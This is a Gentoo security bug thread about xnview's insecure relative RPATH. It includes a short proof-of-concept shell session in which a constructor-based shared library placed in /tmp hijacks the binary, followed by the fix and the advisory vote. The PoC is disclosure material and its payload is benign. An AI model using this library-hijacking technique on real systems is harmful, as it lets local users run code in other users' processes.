Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 117063 - x11-misc/xnview: insecure rpath
Summary: x11-misc/xnview: insecure rpath
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High normal (vote)
Assignee: Gentoo Security
URL:
Whiteboard: B3? [glsa]
Keywords:
Depends on:
Blocks: 81745
  Show dependency tree
 
Reported: 2005-12-29 03:23 UTC by Tavis Ormandy (RETIRED)
Modified: 2005-12-30 04:54 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Tavis Ormandy (RETIRED) gentoo-dev 2005-12-29 03:23:47 UTC
nelchael from desktop-misc herd reported that xnview includes a relative rpath, this means that should the applicatoin be launched from a directory other users have write access to, they can hijack the application.

$ chrpath /opt/bin/nview 
/opt/bin/nview: RPATH=.:/usr/local/lib:/usr/X11R6/lib
$ cd /tmp
$ /opt/bin/nview 
** NVIEW v4.16 Copyright 1991-2002 Pierre-E Gougelet (Feb 17 2004/13:47:38) **
...
$ cat > exploit.c 
#include <stdio.h>
void __attribute__((constructor)) evil (void)
{
        fprintf(stderr, "exploit code now in control.\n");
        _exit(0);
}
^D
$ gcc -fPIC -shared -o libformat.so exploit.c 
$ /opt/bin/nview 
exploit code now in control.

The package has been p.masked by desktop-misc, but may still need a glsa?

this could probably be fixed by using chrpath or patching the RPATH out in the ebuild, but this may violate some license agreement or something.
Comment 1 Krzysztof Pawlik (RETIRED) gentoo-dev 2005-12-29 08:22:35 UTC
Got reply from Pierre-e Gougelet (author of Xnview):

--------
> Is it possible for us to
> modify the RPATH while installing the package - wouldn't it violate the
> licence?

No
--------
Comment 2 Krzysztof Pawlik (RETIRED) gentoo-dev 2005-12-29 08:52:35 UTC
Version 1.70-r1 which fixes this bug is in portage.
Comment 3 Stefan Cornelius (RETIRED) gentoo-dev 2005-12-29 13:39:17 UTC
arches, pls test and mark stable.
Comment 4 Krzysztof Pawlik (RETIRED) gentoo-dev 2005-12-29 13:53:18 UTC
x86 done. 1.70-r1 stable.
Comment 5 Stefan Cornelius (RETIRED) gentoo-dev 2005-12-29 14:25:05 UTC
mhhh ok, seems this ready for glsa vote (is B3 ok here, anyways?). Also, as nelchael pointed out, ppc is probably not vulnerable, but i still want them to take a look while we continue the glsa process without waiting for them to stable.
Comment 6 Tavis Ormandy (RETIRED) gentoo-dev 2005-12-29 14:28:26 UTC
vote YES, pretty serious.
Comment 7 Sune Kloppenborg Jeppesen gentoo-dev 2005-12-29 22:44:48 UTC
We have a draft, lets have a GLSA, I vote yes.
Comment 8 Thierry Carrez (RETIRED) gentoo-dev 2005-12-30 04:54:33 UTC
GLSA 200512-18